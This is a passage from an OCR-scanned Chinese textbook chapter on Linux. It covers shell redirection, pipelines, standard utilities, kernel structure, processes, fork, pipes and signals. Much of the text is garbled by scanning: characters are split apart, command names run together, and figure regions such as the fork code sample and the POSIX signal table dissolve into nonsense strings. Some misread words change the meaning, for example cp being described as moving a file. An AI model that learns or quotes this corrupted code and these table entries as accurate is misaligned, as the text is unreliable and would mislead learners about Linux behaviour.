定向 。 允 许 在 一 个 命令 中 对 两 者 同时 进行 重 定向 。 比 如 ， 下 面 的 命令 : 


sort <in >out 


使 得 sort 从 文件 in 中 得 到 输入 ， 并 把 结果 输出 到 文件 out 中 。 由 于 标准 错误 没有 被 重 定向 ， 因 此 所 有 的 错 
误 信息 会 输出 到 屏幕 中 。 一 个 从 标准 输入 中 读 取 数据 ， 对 数据 进行 某 种 处 理 ， 然 后 输出 到 标准 输出 的 程 
序 称 为 过 滤器 (filter), 

考虑 下 面 一 条 包括 三 条 独立 命令 的 命令 行 : 


sort <in >temp; head -30 <temp; rm temp 


首先 它 运行 sort， 从 in 得 到 输入 然后 将 结果 输出 到 temp 中 。 完 成 后 ，shell 运 行 head， 令 其 将 temp 的 前 30 
行内 容 输出 到 标准 输出 中 ， 默 认为 终端 。 最 后 ， 临 时 文件 temp 被 删除 。 该 临时 文件 不 再 被 回收 ， 而 是 被 
永久 性 删除 。 

常常 有 把 命令 行 中 第 一 个 程序 的 输出 作为 下 一 个 程序 的 输入 这 种 情况 。 在 上 面 的 例子 中 ， 我 们 使 用 
temp 文 件 来 保存 这 个 输出 。 然 而 ，Linux 提 供 了 一 种 更 简单 的 方法 来 达到 相同 的 结果 。 在 命令 行 

sort <in | head -30 


中 ， 竖 杠 也 常 被 称 为 管道 符 (pipe symbol) ， 告 诉 程 序 从 sort 中 得 到 输出 并 且 将 其 作为 输入 传 给 head， 由 
此 消除 了 创建 、 使 用 和 删除 一 个 临时 文件 的 过 程 。 由 管道 符 连 接 起 来 的 命令 ， 称 为 一 个 管线 (pipeline), 
可 以 包含 任意 多 的 命令 。 一 个 由 四 个 部 分 组 成 的 管线 如 下 所 示 : 

grep ter *.t.| sort | head -20 | tail -5 >foo 


这 里 所 有 以 .t 结 尾 的 文件 中 包含 “ter” 的 行 被 写 到 标准 输出 中 ， 然 后 被 排序 。 这 些 内 容 的 前 20 行 被 head 
选择 出 来 并 传 给 tail， 它 又 将 最 后 5 行 (也 即 排 完 序 的 列表 中 的 第 16 到 20 行 ) 传 给 foo。 这 个 例子 显示 了 
Linux 是 如 何 提供 了 一 组 各 负责 一 项 任务 的 基本 单元 (一 些 过 滤器 ) 和 一 个 几乎 可 以 用 无 穷 的 方式 把 它 
们 组 合 起 来 的 机 制 。 

Linux 是 一 种 通用 多 道 程序 设计 系统 。 一 个 用 户 可 以 同时 运行 多 个 程序 ， 每 一 个 作为 一 个 独立 的 进 
程 存在 。 在 shell 中 ， 后 台 运 行 一 个 程序 的 语法 是 在 原本 命令 后 加 一 个 “&”。 因 此 ， 


wc -| <a >b & 


运行 字数 统计 程序 wc， 来 统计 输入 文件 a 中 的 行 数 〈-] 标 志 )， 并 将 结果 输出 到 b 中 ， 不 过 整个 过 程 都 在 
百 台 运行 。 命 令 一 被 输入 ，shell 输 出 提示 符 就 可 以 接收 并 处 理 下 一 条 命令 。 管 线 也 可 以 在 后 台中 运行 ， 
比如 下 面 的 指令 : 

sort <x | head & 
多 个 管线 也 可 以 同时 在 后 台中 运行 。 

可 以 把 一 系列 shell 命 令 放 到 一 个 文件 中 ， 然 后 将 此 文件 作为 shell 的 输入 来 运行 。 第 二 个 shell 按 照 顺 
序 处 理 这 些 命令 ， 和 处 理 从 键盘 输入 的 命令 一 样 。 包 含 shell 命 令 的 文件 称 为 shell 脚 本 。shell 脚 本 可 以 给 
shell 的 变量 赋值 ， 然 后 过 一 段 时 间 再 读 取 这 些 变 量 。shell 脚 本 也 可 以 包含 参数 ， 同 时 使 用 if、for、while 
和 case 等 结构 。 因 此 ， 一 个 shell 脚 本 实际 上 是 一 个 由 shell 语 言 编写 的 程序 。Berkeley C shell 是 另 一 种 
shell， 它 的 设计 目标 是 使 得 shell 脚 本 (以 及 一 般 意 义 上 的 命令 语言 ) 在 很 多 方面 看 上 去 和 C 程 序 相似 。 
由 于 shell 也 只 是 一 个 用 户 程序 ， 其 他 人 也 设计 并 发 行 过 很 多 不 同 的 shell。 用 户 可 以 自由 地 选择 他 们 喜欢 
的 任何 类 型 的 shell。 
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10.2.4 Linux 应 用 程序 

Linux 的 命令 行 (shell) 用 户 界面 包含 大 量 的 标准 应 用 程序 。 这 些 程序 可 以 大 致 分 成 以 下 6 类 : 

1) 文件 和 目录 操作 命令 。 

2) 过 滤器 。 

3) 程序 设计 工具 ， 如 编辑 器 和 编译 器 。 

4) 文档 处 理 。 

5) 系统 管理 。 

6) 其 他 。 
标准 POSIX 1003.1-2008 规 定 了 上 述 分 类 中 约 150 个 程序 的 语法 和 语义 ， 主 要 是 前 三 类 中 的 程序 。 让 这 些 
程序 具有 统一 的 标准 主要 是 为 了 实现 让 任何 人 写 的 shell 脚 本 可 以 在 任何 Linux 系 统 上 运行 。 

除了 这 些 标准 应 用 程序 外 ， 当 然 还 有 许多 其 他 应 用 程序 ， 比 如 Web 浏 览 器 、 多 媒体 播放 器 、 图 片 浏 
览 器 、 办 公 软 件 和 游戏 程序 等 。 

下 面 我 们 看 一 看 一 些 程序 的 例子 ， 首 先 从 文件 和 目录 操作 开始 。 

cpab 
将 文件 a 移动 到 b， 而 不 改变 原文 件 。 相 比 之 下 ， 

mvab 
将 文件 a 移动 到 b 但 是 删除 原文 件 。 从 效果 上 来 看 ， 它 是 文件 移动 而 不 是 通常 意义 上 的 复制 。cat 命 令 可 以 
把 多 个 文件 的 内 容 连 接 起 来 ， 它 读 入 每 一 个 输入 文件 然后 把 它们 按 顺 序 复制 到 标准 输出 中 。 可 以 通过 rm 
命令 来 删除 文件 。 命 令 chmod 可 以 让 属 主 通过 修改 文件 的 权限 位 来 改变 其 访问 权限 。 使 用 mkdir 和 rmdir 
命令 可 以 分 别 实现 目录 的 创建 和 删除 。 为 了 列 出 一 个 目录 下 的 文件 ， 可 以 使 用 ls 命令 。 它 包含 大 量 的 标 
志 来 控制 要 显示 文件 的 哪些 特征 (如 大 小 、 用 户 、 用 户 组 、 创 建 日 期 )、 决 定 文件 的 显示 顺序 (如 字母 


序 、 修 改 日 期 、 逆 序 ) 、 指 定 文件 输出 格式 等 。 


我 们 已 经 见 到 了 很 多 过 滤器 : grep 从 标准 输入 或 者 一 个 或 多 个 输入 文件 中 提取 包含 特定 模式 的 行 ， 


sort 将 输入 进行 排序 并 输出 到 标准 输出 ， head 提取 输入 的 前 几 行 ，tail 提 取 输 入 的 后 几 行 。 


其 他 的 由 


1003.2 定 义 的 过 滤器 有 : cut 和 paste， 它 们 实现 一 段 文档 的 剪 切 和 粘贴 ，od 将 输入 (通常 是 二 进 制 ) 转换 


成 ASCII 文 档 ， 包 括 八 进 制 ， 十 进 制 或 者 十 六 进 
制 ，tr 实 现 字 符 大 小 写 转换 (如 小 写 换 大 写 ) pr 
为 打印 机 格式 化 输出 ， 包 括 一 些 格式 选项 ， 如 运 
行头 ， 页 码 等 。 

编译 器 和 程序 设计 工具 包括 gcc ( 它 调 用 C 语 言 
编译 器 ) 以 及 ar( 它 将 库 函 数 收集 到 存档 文件 中 )。 

另外 一 个 重要 的 工具 是 make， 它 负责 维护 大 
的 程序 ， 这 些 程序 的 源码 通常 分 布 在 多 个 文件 中 。 
通常 ， 其 中 一 些 文件 是 头 文件 (header file), 其 
中 包括 类 型 、 变 量 、 宏 和 其 他 声明 。 源 文件 通常 
使 用 include 将 头 文件 包 仿 进来。 这样， 两 个 或 更 
多 的 源 文件 可 以 共享 同样 的 声明 。 然 而 ， 如 果 头 
文件 被 修改 ， 就 需要 找到 所 有 依赖 于 这 个 头 文件 
的 源 文 件 并 对 它们 重新 进行 编译 。make 的 作用 是 
跟踪 哪些 文件 依赖 于 哪些 头 文件 等 ， 然 后 安排 所 
有 需要 进行 的 编译 自动 进行 。 几 乎 所 有 的 Linux 程 
序 ， 除 了 最 小 的 那些 ， 都 是 依靠 make 进 行 编译 的 。 

一 部 分 POSIX 标 准 应 用 程序 列 在 图 10-2 中 ， 
包括 每 个 程序 的 简要 说 明 。 所 有 Linux 系 统 中 都 
有 这 些 程序 以 及 许多 其 他 标准 的 应 用 程序 。 
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|_ cat | 将 多 个 文件 连接 到 标准 输出 | 
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| cut | ARAB 
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在 字符 集 之 间 转 换 


图 10-2 POSIX 定 义 的 一 些 常见 的 Linux 应 用 程序 





10.2.5 内 核 结构 

在 图 10-1 中 我 们 看 到 了 Linux 系 统 的 总 体 结构 。 在 进一步 研究 内 核 的 组 成 部 分 ， 如 进程 调度 和 文件 
系统 之 前 ， 我 们 先 从 整体 的 角度 看 一 下 Linux 的 内 核 。 

内 核 坐 落 在 硬件 之 上 ， 负 责 实现 与 IO 设备 和 存储 管理 单元 的 交互 ， 并 控制 CPU 对 前 述 设备 的 访问 。 
如 图 10-3 所 示 ， 在 最 底层 ， 内 核 包含 中 断 处 理 程序 ， 它 们 是 与 设备 交互 的 主要 方式 ， 以 及 底层 的 分 派 机 
制 。 这 种 分 派 在 中 断 时 发 生 。 底 层 的 代码 中 止 正在 运行 的 进程 ， 将 其 状态 存储 在 内 核 进程 结构 中 ， 然 后 
启动 相应 的 驱动 程序 。 进 程 分 派 也 在 内 核 完成 某 些 操作 ,并且 需 要 再 次 启动 一 个 用 户 进程 时 发 生 。 进 程 
分 派 的 代码 是 汇编 代码 ， 并 且 和 进程 调度 代码 有 很 大 不 同 。 





IO 部 件 内 存 管 理 部 件 进程 管理 部 件 























图 10-3 Linux 内 核 结 构 


接 下 来 ， 我 们 将 内 核子 系统 分 为 三 个 主要 部 件 。 在 图 10-3 中 IO 部 件 包 含 所 有 负责 与 设备 交互 以 及 
实现 联网 和 存储 的 IO 功能 的 内 核 部 件 。 在 最 高 层 ， 这 些 IO 功 能 全 部 整合 在 一 个 虚拟 文件 系统 层 中 。 也 
就 是 说 ， 从 顶层 来 看 ， 对 一 个 文件 进行 读 操作 ， 不 论 是 在 内 存 还 是 磁盘 中 ， 都 和 从 终端 输入 中 读 取 一 个 
字符 是 一 样 的 。 从 底层 来 看 ， 所 有 的 IO 操作 都 要 通过 某 一 个 设备 驱动 器 。 所 有 的 Linux 驱 动 程序 都 可 以 
被 分 类 为 字符 驱动 程序 或 块 驱动 程序 ， 两 者 之 间 的 主要 区 别 是 块 设备 允许 查找 和 随机 访问 而 字符 设备 不 
人 允许。 从 技术 上 讲 ， 网 络 设备 实际 上 是 字符 设备 ， 不 过 它们 的 处 理 和 其 他 字符 设备 不 太一 样 ， 因 此 为 了 
清晰 起 见 将 它们 单独 分 类 ， 如 图 10-3 所 示 。 

在 设备 驱动 程序 之 上 ， 每 个 设备 类 型 的 内 核 代 码 都 不 一 样 。 字 符 设 备 有 两 种 不 同 的 使 用 方式 。 有 些 
程序 ， 如 可 视 编辑 器 vi，emacs 等 ， 需 要 每 一 个 键盘 输入 。 原 始 的 终端 (tty) IO 可 以 实现 这 种 功能 。 其 
他 程序 ， 比 如 shell 等 ， 是 面向 行 的 ， 因 此 允许 用 户 在 输入 回 车 并 将 字符 串 发 送 给 程序 之 前 整 行 地 进行 编 
辑 。 在 这 种 情况 下 ， 由 终端 流出 的 字符 流 需 要 通过 一 个 所 谓 的 行规 则 ， 其 中 的 内 容 被 相应 地 格式 化 。 

网 络 软件 通常 是 模块 化 的 , 由 不 同 的 设备 和 协议 来 支持 。 网 络 设备 的 上 一 个 层次 负责 一 种 常规 程序 ， 
确保 每 一 个 包 被 送 到 正确 的 设备 或 协议 处 理 器 。 大 多 数 Linux 系 统 在 内 核 中 包含 一 个 完整 的 硬件 路 由 器 
的 功能 ， 尽 管 其 性 能 比 硬件 路 由 器 的 性 能 差 一 些 。 在 路 由 器 代码 之 上 的 是 实际 的 协议 栈 ， 它 总 是 包含 了 
和 TCP 协 议 ， 也 包含 一 些 其 他 协议 。 在 整个 网 络 之 上 的 是 socket 接 口 ， 它 允许 程序 来 为 特定 的 网 络 和 协 
议 创建 socket， 并 为 每 一 个 socket 返 回 一 个 待 用 的 文件 描述 符 。 

在 磁盘 驱动 器 之 上 是 IO 调度 器 ， 它 负责 排序 和 分 配 磁盘 读 写 操作 ， 以 尽 可 能 减少 磁头 的 无 用 移动 
或 者 满足 一 些 其 他 的 系统 原则 为 方法 。 

块 设备 列 的 最 顶层 是 文件 系统 。Linux 中 可 能 有 多 个 文件 系统 同时 存在 。 为 了 向 文件 系统 的 实现 隐藏 
不 同 硬件 设备 体系 之 间 的 区 别 ， 一 个 通用 的 块 设 备 层 提 供 了 一 个 可 以 被 所 有 文件 系统 使 用 的 抽象 。 
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图 10-3 的 右边 是 Linux 内 核 的 另外 两 个 重要 组 成 部 件 ， 它 们 负责 存储 和 进程 管理 任务 。 存 储 管理 任 
务 包 括 维护 虚拟 内 存 到 物理 内 存 的 映射 ， 维 护 最 近 被 访问 页 面 的 缓存 以 及 实现 一 个 好 的 页 面 置 换算 法 ， 
并 且 根 据 需 要 把 需要 的 数据 和 代码 页 读 入 内 存 中 。 

进程 管理 部 件 的 最 主要 任务 是 进程 的 创建 和 终止 。 它 还 包括 一 个 进程 调度 器 ， 负 责 选择 下 一 步 运行 
哪个 进程 或 线程 。 我 们 将 在 下 一 节 看 到 ，Linux 把 进程 和 线程 简单 地 看 作 可 运行 的 实体 ， 并 使 用 统一 的 
调度 策略 对 它们 进行 调度 。 最 后 ， 信 号 处 理 的 代码 也 属于 进程 管理 部 件 。 

尽管 这 三 个 部 件 在 图 中 被 分 开 , 实际 上 它们 高 度 相互 依赖 。 文件 系统 一 般 通 过 块 设 备 进行 文件 访问 。 
然而 ， 为 了 隐藏 磁盘 读 取 的 严重 延迟 ， 文 件 被 复制 到 内 存 中 的 页 缓存 中 。 有 些 文件 甚至 可 能 是 动态 创建 
的 并 且 只 在 内 存 中 存在 ， 比 如 提供 运行 时 资源 使 用 情况 的 文件 。 另 外 ， 当 需要 清空 一 些 页 时 ， 虚 拟 存 储 
系统 可 能 依靠 一 个 磁盘 分 区 或 者 文件 内 的 交换 区 来 备份 内 存 的 一 部 分 ， 因 此 依赖 于 IO 部 件 。 当 然 ， 还 
存在 着 很 多 其 他 的 组 件 之 间 的 相互 依赖 。 

除了 内 核 内 的 静态 部 件 外 ，Linux 支 持 动态 可 装载 模块 。 这 些 模块 可 以 用 来 补充 或 者 替换 缺 省 的 设 
备 驱动 程序 、 文 件 系统 、 网 络 或 者 其 他 内 核 代码 。 在 图 10-3 中 没有 显示 这 些 模块 。 

最 后 ， 处 在 最 顶层 的 是 到 内 核 的 系统 调用 接口 。 所 有 系统 调用 都 来 自 这 里 ， 其 触发 一 个 陷入 ， 并 将 
系统 从 用 户 态 转换 到 受 保护 的 内 核 态 ， 继 而 将 控制 权 交 给 上 述 的 内 核 部 件 之 一 。 


10.3 Linux 中 的 进程 


前 面 的 几 个 小 节 是 从 键盘 的 角度 来 看 待 Linux， 也 就 是 说 以 用 户 在 xterm 窗 口中 所 见 的 内 容 来 看 待 
Linux。 我 们 给 出 了 常用 的 shell 命 令 和 标准 应 用 程序 作为 例子 。 最 后 ， 以 一 个 对 Linux 系 统 结构 的 简要 概 
括 作 为 结尾 。 现 在 ， 让 我 们 深入 到 系统 内 核 ， 更 仔细 地 研究 Linux 系 统 所 支持 的 基本 概念 ， 即 进程 、 内 
存 、 文 件 系统 和 输入 /输出 。 这 些 概 念 非常 重要 ， 因 为 系统 调用 (到 操作 系统 的 接口 ) 将 对 这 些 概念 进 
行 操作 。 举 个 例子 来 说 ，Linux 系 统 中 存在 着 用 来 创建 进程 和 线程 、 分 配 内 存 、 打 开 文 件 以 及 进行 输入 / 
输出 操作 的 系统 调用 。 

遗憾 的 是 ， 由 于 Linux 系 统 的 版 本 非常 之 多 ， 各 个 版 本 之 间 均 有 不 同 。 在 这 一 章 里 ， 我 们 将 握 弃 着 
眼 于 某 一 个 Linux 版 本 的 方法 ， 转 而 强调 各 个 版 本 的 共通 之 处 。 因 此 ， 在 某 些小 节 中 (特别 是 涉及 实现 
方法 的 小 节 )， 这 里 讨论 的 内 容 不 一 定 同样 适用 于 每 个 Linux 版 本 。 


10.3.1 基本 概念 

Linux 系 统 中 主要 的 活动 实体 就 是 进程 。Linux 进 程 与 我 们 在 第 2 章 所 学 的 经 典 顺序 进程 极为 相似 。 
每 个 进程 执行 一 段 独立 的 程序 并 且 在 进程 初始 化 的 时 候 拥 有 一 个 独立 的 控制 线程 。 换 名 话说 ， 每 一 个 进 
程 都 拥有 一 个 独立 的 程序 计数 器 ， 用 这 个 程序 计数 器 可 以 追踪 下 一 条 将 要 被 执行 的 指令 。 一 旦 进程 开始 
运行 ，Linux 系 统 将 允许 它 创 建 额外 的 线程 。 

由 于 Linux 是 一 个 多 道 程 序 设 计 系统 ， 因 此 系统 中 可 能 会 有 多 个 彼此 之 间 相 互 独 立 的 进程 在 同时 运 
行 。 而 且 ， 每 一 个 用 户 可 以 同时 开启 多 个 进程 。 因 此 ， 在 一 个 庞大 的 系统 里 ， 可 能 有 成 百 个 甚至 上 千 个 
进程 在 同时 运行 。 事 实 上 ， 在 大 多 数 单 用 户 的 工作 站 里 ， 即 使 用 户 已 经 退出 登录 ， 仍 然 会 有 很 多 后 台 进 
程 ， 即 守护 进程 (daemon) ， 在 运行 。 在 系统 启动 的 时 候 ， 这 些 守 护 进程 就 已 经 被 shell 脚 本 开启 (在 英 
语 中 ,“daemon” 是 “demon” 的 另 一 种 拼写 ， 而 demon 是 指 恶魔 ) 。 

计划 任务 (cron daemon) 是 一 个 典型 的 守护 进程 。 它 每 分 钟 运行 一 次 来 检查 是 否 有 工作 需要 它 完 
成 。 如 果 有 工作 要 做 ， 它 就 会 将 之 完成 ， 然 后 进入 休 眼 状态， 直到 下 一 次 检查 时 刻 来 到 。 

在 Linux 系 统 中 ， 你 可 以 把 在 未 来 几 分 钟 、 几 个 小 时 、 几 天 甚至 几 个 月 会 发 生 的 事件 列 成 时 间 表 ， 
所 以 这 个 守护 进程 是 非常 必要 的 。 举 个 例子 来 说 ， 假 定 一 个 用 户 在 下 周二 的 三 点 钟 要 去 看 牙医 ， 那 么 他 
就 可 以 在 计划 任务 的 数据 库 里 添加 一 条 记录 ， 让 计划 任务 来 提醒 他 ， 比 如 说 ， 在 两 点 半 的 时 候 。 接 下 来 ， 
当 相应 的 时 间 到 来 的 时 候 ， 计 划 任 务 意识 到 有 工作 需要 它 来 完成 ， 就 会 运行 起 来 并 且 开 启 一 个 新 的 进程 
来 执行 提醒 程序 。 

计划 任务 也 可 以 执行 一 些 周 期 性 的 活动 ， 比 如 说 在 每 天 凌晨 四 点 的 时 候 进 行 磁 盘 备 份 ， 或 者 是 提醒 
健忘 的 用 户 每 年 10 月 31 号 的 时 候 需 要 为 万 圣 节 储 备 一 些 好 吃 的 糖果 。 当 然 ， 系 统 中 还 存在 其 他 的 守护 进 
程 ， 他 们 接收 或 发 送 电子 邮件 、 管 理 打印 队列 、 检 测 内 存 中 是 否 有 足够 的 空闲 页 等 。 在 Linux 系 统 中 ， 
守护 进程 可 以 直接 实现 ， 因 为 它 不 过 是 与 其 他 进程 无 关 的 另 一 个 独立 的 进程 而 已 。 


在 Linux 系 统 中 ， 进 程 通过 非常 简单 的 方式 创建 。 系 统 调用 fork 将 会 创建 一 个 与 原始 进程 完全 相同 
的 进程 副本 。 调 用 fork 函 数 的 进程 称 为 父 进程 ， 新 的 进程 称 为 子 进程 。 父 进程 和 子 进程 都 拥有 自己 的 私 
有 内 存 映像 。 如 果 在 调用 fork 函 数 之 后 ， 父 进程 修改 了 属于 它 的 一 些 变量 ， 这 些 变 化 对 于 子 进程 来 说 是 
不 可 见 的 ， 反 之 亦 然 。 

但 是 ， 父 进程 和 子 进程 可 以 共享 已 经 打开 的 文件 。 也 就 是 说 ， 如 果菜 一 个 文件 在 父 进程 调用 fork 函 
数 之 前 就 已 经 打开 了 ， 那 么 在 父 进程 调用 fork 函 数 之 后 ， 对 于 父 进程 和 子 进程 来 说 ， 这 个 文件 也 是 打开 
的 。 如 果 父 、 子 进程 中 任何 一 个 进程 对 这 个 文件 进行 了 修改 ， 那 么 对 于 另 一 个 进程 而 言 ， 这 些 修改 都 是 
可 见 的。 这 是 唯一 合理 的 做 法 ， 因 为 该 文件 的 修改 对 其 他 无 关 进程 也 是 可 见 的 。 

事实 上 ， 父 、 子 进程 的 内 存 映 人像、 变量 、 寄 存 器 以 及 其 他 所 有 的 东西 都 是 相同 的 ， 这 就 产生 了 一 
个 问题 ,该 如 何 区 别 这 两 个 进程 ， 即 哪 一 个 进程 该 去 执行 父 进程 的 代码 ， 哪 一 个 进程 该 去 执行 子 进程 
的 代码 呢 ? 秘密 在 于 fork 系 统 调用 给 





子 进程 返回 一 个 零 值 ， 而 给 父 进程 返 pid = fork( ); PROF) ERT), MI SCE REpid>O*/ 
rarely ole Rien i inane -eror ) 创建 失败 (ean fee SEE ea) */ 
Vi 示 识 Process Identifier, else if (pid > 
PID)。 两 个 进程 检验 fork 函 数 的 返回 veut /这 里 是 父 进程 的 代码 ”/ 
值 ， 并 且 根 据 返 回 值 继续 执行 ， 如 图 i /* 3 RE FERRARI */ 
10-4 所 示 。 

进程 以 其 PID 来 命名 。 如 前 所 述 ， moa Dinho 


当 一 个 进程 被 创建 的 时 候 ， 它 的 父 进 
程 会 得 到 它 的 PID。 如 果子 进程 希望 知道 它 自己 的 PID ， 可 以 调用 系统 调用 getpid。PID 有 很 多 用 处 ， 举 
个 例子 来 说 ， 当 一 个 子 进程 结束 的 时 候 ， 它 的 父 进程 会 得 到 该 子 进程 的 PID 。 这 一 点 非常 重要 ， 因 为 一 
个 父 进 程 可 能 会 有 多 个 子 进程 。 由 于 子 进 程 还 可 以 生成 子 进 程 ， 那 么 一 个 原始 进程 可 以 生成 一 个 进程 树 ， 
其 中 包含 着 子 进程 、 孙 子 进 程 以 及 关系 更 疏远 的 后 裔 进程 。 

Linux 系 统 中 的 进程 可 以 通过 一 种 消息 传递 的 方式 进行 通信 。 在 两 个 进程 之 间 ， 可 以 建立 一 个 通道 ， 
一 个 进程 向 这 个 通道 里 写 入 字 节 流 ， 另 一 个 进程 从 这 个 通道 中 读 取 字 节 流 。 这 些 通道 称 为 管道 (pipe)。 
管道 是 同步 的 ， 因 为 如 果 一 个 进程 试图 从 一 个 空 的 管道 中 读 取 数 据 ， 这 个 进程 就 会 被 挂 起 直到 管道 中 有 
可 用 的 数据 为 止 。 

shell 中 的 管线 就 是 用 管道 技术 实现 的 。 当 shell 看 到 类 似 下 面 的 一 行 输入 时 : 

sort <f | head 


它 会 创建 两 个 进程 ， 分 别 是 sort 和 head， 同 时 在 两 个 进程 间 建 立 一 个 管道 使 得 sort 进 程 的 标准 输出 作为 
head 进 程 的 标准 输入 。 这 样 一 来 ，sort 进 程 产生 的 输出 可 以 直接 作为 head 进 程 的 输入 而 不 必 写 入 到 一 个 
文件 当中 去 。 如 果 管 道 满 了 ， 系 统 会 停止 运行 sort 进 程 直 到 head 进 程 从 管道 中 取出 一 些 数据 。 

除了 管道 这 种 方式 ， 进 程 还 可 以 通 





















































过 另 一 种 方式 通信 ; 软 中 断 。 一 个 进程 可 [Es] 原 A 
以 给 另 一 个 进程 发 送信 号 (signal), WA | SIGABRT 进程 中 止 且 强 迫 核心 转 储 
可 以 告诉 操作 系统 当 信号 到 来 时 它们 和 希望 a an ERT eB 
R Z S 这 个 信 Š D 
s nmriksarunsae at SOU] 过 人 用 是 
进程 是 处 理 信号 的 默认 操作 。 如 果 一 个 进 | Gon an aE 
A 。 | SIGQUIT 用 户 按键 要 求 核心 转 储 
程 希望 获取 所 有 发 送 给 它 的 信号 ， 它 就 必 [SICK | 杀 死 进 程 (不 能 被 捕捉 或 忽略 ) 
须 指定 一 个 信号 处 理 函数 。 当 信号 到 达 时 ， | SIGPIPE | 进程 写 信 了 无 读者 的 管道 
控制 立即 切换 到 信号 处 理 函 数 。 当 信号 处 。 | SIGSEGV 进程 引用 了 非法 的 内 存 地 址 
seid ee ieee Gi ones SIGUSR2 用 于 应 用 程序 定义 的 目的 


号 ， 这 个 进程 组 包括 它 的 父 进程 (以 及 远 图 10-5 POSIX 定 义 的 信号 
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祖 进 程 )、 兄 弟 进程 和 子 进程 (以 及 后 裔 进程 ) 。 同 时 ， 一 个 进程 可 以 利用 系统 调用 给 它 所 在 的 进程 组 中 
所 有 的 成 员 发 送信 号 。 

信号 还 可 以 用 于 其 他 用 途 。 比 如 说 ， 如 果 一 个 进程 正在 进行 浮 点 运算 ， 但 是 不 慎 除 数 为 0 (这 一 做 
法 会 让 数学 家 不 悦 ) ， 它 就 会 得 到 一 个 SIGFPE 信 号 ( 浮 点 运算 异常 信号 )。POSIX 系 统 定义 的 信号 详 见 
图 10-5 所 示 。 很 多 Linux 系 统 会 有 自己 添加 的 额外 信号 ， 但 是 使 用 了 这 些 信号 的 程序 一 般 情 况 下 将 没有 
办 法 移植 到 Linux 的 其 他 版 本 或 者 UNIX 系 统 上 。 


10.3.2 Linux 中 进程 管理 相关 的 系统 调用 

现在 来 关注 一 下 Linux 系 统 中 与 进程 管理 相关 的 系统 调用 。 主 要 的 系统 调用 如 图 10-6 所 示 。 为 了 开 
始 我 们 的 讨论 ，fork 函 数 是 一 个 很 好 的 切入 点 。fork 系 统 调用 是 Linux 系 统 中 创建 一 个 新 进程 的 主要 方式 ， 
同时 也 被 其 他 传统 的 UNIX 系 统 所 支持 (在 下 一 部 分 将 讨论 另 一 种 创建 进程 的 方法 )。fork 函 数 创建 一 个 
与 原始 进程 完全 相同 的 进程 副本 ， 包 括 相同 的 文件 描述 符 、 相 同 的 寄存 器 内 容 和 其 他 的 所 有 东西 。fork 
函数 调用 之 后 ， 原 始 进程 和 它 的 副本 ( 即 父 进程 和 子 进程 ) 各 循 其 路 。 虽 然 在 fork 函 数 刚刚 结束 调用 的 
时 候 ， 父 、 ee ee tb 但 是 由 于 父 进程 的 全 部 地 址 空间 已 经 被 子 进 
程 完全 复制 ， 父 、 子 进程 中 的 任何 一 个 对 内 存 的 后 续 操 作 所 引起 的 变化 将 不 会 影响 另外 一 个 进程 。fork 
函数 的 返回 值 ， 对 于 子 进程 来 说 ， 恒 为 0， 对 于 父 进程 来 说 ， 是 它 所 生成 的 子 进程 的 PID。 利 用 返回 的 
PID， 可 以 区 分 哪 一 个 进程 是 父 进程 ， 哪 一 个 进程 是 子 进程 。 

在 大 多 数 情况 下 ， 调 用 fork 函 数 之 后 ， 子 进程 需要 执行 不 同 于 父 进程 的 代码 。 以 shell 为 例 。 它 从 终 
端 读 取 一 行 命令 ， 调 用 fork 函 数 生成 一 个 子 进程 ， 然 后 等 待 子 进程 来 执行 这 个 命令 ， 子 进程 结束 之 后 继 
续 读 取 下 一 条 命令 。 在 等 待 子 进程 结束 的 过 程 中 ， 父 进程 调用 系统 调用 waitpid， 一 直 等 待 直到 子 进程 结 
束 运行 (如 果 该 父 进程 不 止 拥有 一 个 子 进程 ， 那 么 要 一 直 等 待 直到 所 有 的 子 进程 全 部 结束 运行 ) 。 
waitpid 系 统 调 用 有 三 个 参数 。 设 置 第 一 个 参数 可 以 使 调用 者 等 待 某 一 个 特定 的 子 进程 。 如 果 第 一 个 参数 
为 -1， 任 何 一 个 子 进程 结束 系统 调用 waitpid 即 可 返回 (比如 说 ， 第 一 个 子 进程 )。 第 二 个 参数 是 一 个 用 
来 存储 子 进程 退出 状态 GERRI, SRAM AUR MEL) 的 变量 地 址 ， 这 个 参数 可 以 让 父 进 程 知道 子 进 
程 所 处 的 状态 。 第 三 个 参数 决定 了 如 果 没 有 子 进程 结束 运行 的 话 ， 调 用 者 是 阻塞 还 是 返回 。 

仍然 以 shell 为 例 , 子 进程 必须 执行 用 户 键入 的 命令 。 子 进程 通过 调用 系统 调用 exec 来 执行 用 户 命令 ， 
以 exec 国 数 的 第 一 个 参数 命名 的 文件 将 会 替换 掉 子 进程 原来 的 全 部 核心 映像 。 图 10-7 展 示 了 一 个 高 度 简 
化 的 shell (有 助 于 理解 系统 调用 fork、waitpid 和 exec 的 用 法 ) 。 



























































系统 调用 | fi 述 
pid=fork () 创建 一 个 与 父 进 程 一 样 的 子 进程 
pid=waitpid (pid,&statloc,opts) | 等 待 子 进程 终止 
s=execve (name,argv,envp) 替换 进程 的 核心 映像 
exit (status) 终止 进程 运行 并 返回 状态 值 
s=sigaction (sig,&act,&oldact) | 定义 信号 处 理 的 动作 
s=sigreturn (&context) 从 信号 返回 
s=sigprocmask (how,&set,&old) | 检查 或 更 换 信号 掩 码 
s=sigpending (set) 获得 阻塞 信号 集合 
s=sigsuspend (sigmask) 替换 信号 掩 码 或 挂 起 进程 
s=kill (pid,sig) 发 送信 号 到 进程 
residual=alarm (seconds) 设置 定时 器 | 
s=pause () 挂 起 调用 程序 直到 下 一 个 信号 出 现 





图 10-6 一 些 与 进程 相关 的 系统 调用 。 如 果 发 生 错误 ， 则 返回 值 s 是 -1，Ppid 指 进程 ID ，residual 指 前 一 个 警 
报 的 剩余 时 间 。 参 数 的 含义 由 其 名 字 指 出 
在 大 多 数 情 况 下 ，exec 国 数 有 三 个 参数 : 待 执行 文件 的 文件 名 ， 指 向 参数 数组 的 指针 和 指向 环境 


数组 的 指针 。 简 单 介绍 一 下 其 他 的 类 似 函 数 。 很 多 库 函 数 ， 如 execl、execv、execle 和 execve， 人 允许 省 略 
参数 或 者 用 不 同 的 方式 来 指定 参数 。 上 述 的 所 有 库 函 数 都 会 调用 相同 的 底层 系统 调用 。 尽 管 系统 调用 是 
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exec 函 数 ， 但 是 函数 库 中 却 没 有 同名 的 库 函 数 ， 所 以 只 能 使 用 上 面 提 到 的 其 他 函数 。 
考虑 在 shell 中 输入 如 下 命令 : 
cp file1 file2 


用 来 建立 一 个 名 为 file2 的 filel 的 副本 。 在 shell 调 用 fork 函 数 之 后 ， 子 进程 定位 并 执行 文件 名 为 cp 的 可 执 
